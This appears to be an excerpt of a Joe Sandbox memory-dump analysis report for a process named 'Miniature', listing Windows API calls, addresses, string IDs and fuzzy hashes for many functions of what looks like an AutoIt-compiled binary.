                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 2710830443-0
                                                  • Opcode ID: b8fadc57cd708e0a4b821fe503559ba36fd4d6ed78862121359984dbac580706
                                                  • Instruction ID: 4bd96c9038fad35935f9d8775ea45e9732fd7faa3e8aeb25c047bbc368b7661a
                                                  • Opcode Fuzzy Hash: b8fadc57cd708e0a4b821fe503559ba36fd4d6ed78862121359984dbac580706
                                                  • Instruction Fuzzy Hash: 86E06D31941328BBEB315EA2DD0CEE77F1CEF15BA1F208021F54985058C77A9540DBE0
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00F9260D
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00F92617
                                                  • SetBkMode.GDI32(?,00000001), ref: 00F9262C
                                                  • GetStockObject.GDI32(00000005), ref: 00F92634
                                                  • GetWindowDC.USER32(?,00000000), ref: 00FCC1C4
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FCC1D1
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00FCC1EA
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00FCC203
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00FCC223
                                                  • ReleaseDC.USER32(?,00000000), ref: 00FCC22E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  • Opcode ID: fae3eb62e42c0391b3df3929036204fd8c8f23e23d106431f2a670bce9cca75f
                                                  • Instruction ID: 4a37b597d8f8ae38b7c7e5562e96c381cc94d6f6c42fed13b0935fafdf819a28
                                                  • Opcode Fuzzy Hash: fae3eb62e42c0391b3df3929036204fd8c8f23e23d106431f2a670bce9cca75f
                                                  • Instruction Fuzzy Hash: AFE06531904344BFDF315F64A809BD83B11EB05331F248366FAAD480DD87764580DB11
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00FE9339
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FE8F04), ref: 00FE9340
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FE8F04), ref: 00FE934D
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FE8F04), ref: 00FE9354
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: 9966f6956f6bb0f36aab13199f7d3157dc6ebfd3d2c63d0189c3435592652954
                                                  • Instruction ID: 2e59c9a1aa859b8050a9b8c9d3db7ffd9e3145bb1f73d5cf90b890865df5718b
                                                  • Opcode Fuzzy Hash: 9966f6956f6bb0f36aab13199f7d3157dc6ebfd3d2c63d0189c3435592652954
                                                  • Instruction Fuzzy Hash: D6E04F72A013119FE7305FB25D0DB563B6CAF557A1F208858F285D9088E67D9444C760
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 00FD0679
                                                  • GetDC.USER32(00000000), ref: 00FD0683
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FD06A3
                                                  • ReleaseDC.USER32(?), ref: 00FD06C4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: 46590aef32ff311cae1e388baac6fd11d13b1dcf012a5b8c994722848767f820
                                                  • Instruction ID: bb5734f17cf08a10b02ae8c4d83e586a40859a077f6c98b914fb17853288eb04
                                                  • Opcode Fuzzy Hash: 46590aef32ff311cae1e388baac6fd11d13b1dcf012a5b8c994722848767f820
                                                  • Instruction Fuzzy Hash: 7AE0C275800304EFDB319FA09808A5D7BA1AB9C311F218005F89AA6608CA399542AF50
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 00FD068D
                                                  • GetDC.USER32(00000000), ref: 00FD0697
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00FD06A3
                                                  • ReleaseDC.USER32(?), ref: 00FD06C4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: a50715442b2aabe6ed98151d4422ad73a15b4cbac3e580f14e51b47ec0e007f1
                                                  • Instruction ID: 4c795a3ed9038f6c520de5c7d237bef90cecd800bc8fbe8f921d09429fecce83
                                                  • Opcode Fuzzy Hash: a50715442b2aabe6ed98151d4422ad73a15b4cbac3e580f14e51b47ec0e007f1
                                                  • Instruction Fuzzy Hash: 39E0EEB5800304AFDF319FA0D80CA9D7BA1AB9C311F208009F99AA7208CB3E95429F50
                                                  APIs
                                                    • Part of subcall function 00FA436A: _wcscpy.LIBCMT ref: 00FA438D
                                                    • Part of subcall function 00F94D37: __itow.LIBCMT ref: 00F94D62
                                                    • Part of subcall function 00F94D37: __swprintf.LIBCMT ref: 00F94DAC
                                                  • __wcsnicmp.LIBCMT ref: 00FFB670
                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00FFB739
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                  • String ID: LPT
                                                  • API String ID: 3222508074-1350329615
                                                  • Opcode ID: 6ecc906ec1d0d1d38a0776c9d780aa4f7cb206170592c08b39323ecec09bf115
                                                  • Instruction ID: a5c24995d4abe67925599fcd86d34452a01b08bde4e15483037bc5b92687f4bf
                                                  • Opcode Fuzzy Hash: 6ecc906ec1d0d1d38a0776c9d780aa4f7cb206170592c08b39323ecec09bf115
                                                  • Instruction Fuzzy Hash: B9619476E00219AFDB14EF54C891EBEB7B4EF48310F108059F546AB361D774AE41EB50
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00F9E01E
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F9E037
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: aefb29b615f67fba41e35d44d31d82d1fbdc2a94bfc72b143e557c5a371df467
                                                  • Instruction ID: ff9a7e437e200d67e3d3ca31634292f0b51f1aaab0ea09c389e08d2c63ab75f7
                                                  • Opcode Fuzzy Hash: aefb29b615f67fba41e35d44d31d82d1fbdc2a94bfc72b143e557c5a371df467
                                                  • Instruction Fuzzy Hash: F3516871408744ABE320AF50EC86FAFBBF8FB94318F51484DF1D8410A5DB75A42ADB56
                                                  APIs
                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 01018186
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0101819B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: '
                                                  • API String ID: 3850602802-1997036262
                                                  • Opcode ID: 1406a47310d3081f63410ff2ad3cca279aefb10a8fb0353de8948e3f75af0e48
                                                  • Instruction ID: bfb9b74da776073510cf88d315ab70e94f4fb23b6c628c1314140dabecb8942b
                                                  • Opcode Fuzzy Hash: 1406a47310d3081f63410ff2ad3cca279aefb10a8fb0353de8948e3f75af0e48
                                                  • Instruction Fuzzy Hash: 68411B75A013099FDB54CF68C881BDA7BF9FB09300F10456AED44AB346D775AA41CF90
                                                  APIs
                                                  • _memset.LIBCMT ref: 01002C6A
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 01002CA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  • Opcode ID: e42631878bfb2560dd965376e46a07ce2caa28391ba1da38fe8c6c08029d3588
                                                  • Instruction ID: 0e2c23f982db87342c86158c54f29e4b6f67ad28b8f3d0593a7678f235b4c1c5
                                                  • Opcode Fuzzy Hash: e42631878bfb2560dd965376e46a07ce2caa28391ba1da38fe8c6c08029d3588
                                                  • Instruction Fuzzy Hash: F8313C71C00219ABDF11EFA5CC85AEEBFB9FF05350F00005AF915A6162EB355916DBA0
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?,?), ref: 0101713C
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01017178
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: ea07f8905a5c0c17ac77696fd7219a71863359dc45e4cff3587b94cda0e3557d
                                                  • Instruction ID: e0d669b9ec9506a718feeaba06e5f300bb2c24e0969d4e9a10d9cd6cc17d3c2a
                                                  • Opcode Fuzzy Hash: ea07f8905a5c0c17ac77696fd7219a71863359dc45e4cff3587b94cda0e3557d
                                                  • Instruction Fuzzy Hash: EE317E75100604AAEB219F78CC80AFB77AAFF48724F109619F9D587195DB39A881D760
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FF30B8
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00FF30F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 3b671b445177f078e4aaec00c0d00d76195d4e6864f731e99978b8cd70e7e4b5
                                                  • Instruction ID: e97ff8a201e4a6fb2d25aec5246dc4619410d20495af7a24c2f89bc9fde76498
                                                  • Opcode Fuzzy Hash: 3b671b445177f078e4aaec00c0d00d76195d4e6864f731e99978b8cd70e7e4b5
                                                  • Instruction Fuzzy Hash: 2E31A531E0030D9BEB249E59C885BBEBBB9EF06360F144019EE85A61B1D7709B44EB50
                                                  APIs
                                                  • __snwprintf.LIBCMT ref: 01004132
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: __snwprintf_memmove
                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                  • API String ID: 3506404897-2584243854
                                                  • Opcode ID: b9f36733944aa75172372b30ae721d69cea83b0132cd184fd39cd4b6c25f5e7d
                                                  • Instruction ID: bfb81cccf76f5ef3bf86b0114a39ba04d681c7764785b9b71e4983e50995cd65
                                                  • Opcode Fuzzy Hash: b9f36733944aa75172372b30ae721d69cea83b0132cd184fd39cd4b6c25f5e7d
                                                  • Instruction Fuzzy Hash: DB219174B00218ABDF11EE65CC81AEE77B5BB55340F000468FA45EB181DB34E905DBA5
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01016D86
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01016D91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: Combobox
                                                  • API String ID: 3850602802-2096851135
                                                  • Opcode ID: 6c87a92525bef81f45bab2f64841773dd163210bfb4feac26d6303be0007e61c
                                                  • Instruction ID: 093a0a089988a74cecae3c0aeeeff6ee04c2b91b033b4c77b6ff7f31f1deee75
                                                  • Opcode Fuzzy Hash: 6c87a92525bef81f45bab2f64841773dd163210bfb4feac26d6303be0007e61c
                                                  • Instruction Fuzzy Hash: 3811C8717002087FEF629E58DC80EFB3BAAEB84364F514129F9549B295D67A9C908760
                                                  APIs
                                                    • Part of subcall function 00F92111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9214F
                                                    • Part of subcall function 00F92111: GetStockObject.GDI32(00000011), ref: 00F92163
                                                    • Part of subcall function 00F92111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9216D
                                                  • GetWindowRect.USER32(00000000,?), ref: 01017296
                                                  • GetSysColor.USER32(00000012), ref: 010172B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                  • String ID: static
                                                  • API String ID: 1983116058-2160076837
                                                  • Opcode ID: 1a24da76d7293f4112788796b27c2d0910fb928a473a6a51dd072ee5c7713639
                                                  • Instruction ID: fa0e5b08181273ee4e611ad600fd9c983267f7dbeffeaa18a945a30fe2463a76
                                                  • Opcode Fuzzy Hash: 1a24da76d7293f4112788796b27c2d0910fb928a473a6a51dd072ee5c7713639
                                                  • Instruction Fuzzy Hash: B621147261020AAFDB15DFA8CC45AFABBE8EB08314F104658FD95D3245E639A8919B60
                                                  APIs
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 01016FC7
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 01016FD6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: LengthMessageSendTextWindow
                                                  • String ID: edit
                                                  • API String ID: 2978978980-2167791130
                                                  • Opcode ID: 3cb9e85c9f069e142f011ad417f9387abc7f19e08bbe13ff15475dd973ad42f6
                                                  • Instruction ID: b37dac6d70260319b4296ee5f42f2d529211779387946c72f1950049e81d6d48
                                                  • Opcode Fuzzy Hash: 3cb9e85c9f069e142f011ad417f9387abc7f19e08bbe13ff15475dd973ad42f6
                                                  • Instruction Fuzzy Hash: F9118271100209AFEB614E68DC44EFB3BA9EB04364F904758F9A4971D9C7BBDC509760
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FF31C9
                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FF31E8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: InfoItemMenu_memset
                                                  • String ID: 0
                                                  • API String ID: 2223754486-4108050209
                                                  • Opcode ID: 62c0155e19fc75652077080db30afec5a182e94522a551b3dca18c884cea2b66
                                                  • Instruction ID: 3680f42778ecf8fa446b14a3dfd33d6605bb9c1e90a4066740b7c152078fe77e
                                                  • Opcode Fuzzy Hash: 62c0155e19fc75652077080db30afec5a182e94522a551b3dca18c884cea2b66
                                                  • Instruction Fuzzy Hash: FE11E931D0021CABDB20DEA8DC45BBE77B8AF05320F140152EA45A7260D774AF05EB91
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 010028F8
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01002921
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: d37899b5967ca802421283d787003aefa6313b5c72c34fc4e2b8b9ec6381c9c7
                                                  • Instruction ID: 8139ac25a58be325276428daccd00855a09b10d68e190a434714b7db4a1a36ad
                                                  • Opcode Fuzzy Hash: d37899b5967ca802421283d787003aefa6313b5c72c34fc4e2b8b9ec6381c9c7
                                                  • Instruction Fuzzy Hash: C011E074502325BAFB668E558C8CEBBFFA8FF05290F10816AF98546080E3705A94DBF0
                                                  APIs
                                                    • Part of subcall function 010086E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0100849D,?,00000000,?,?), ref: 010086F7
                                                  • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010084A0
                                                  • htons.WSOCK32(00000000,?,00000000), ref: 010084DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
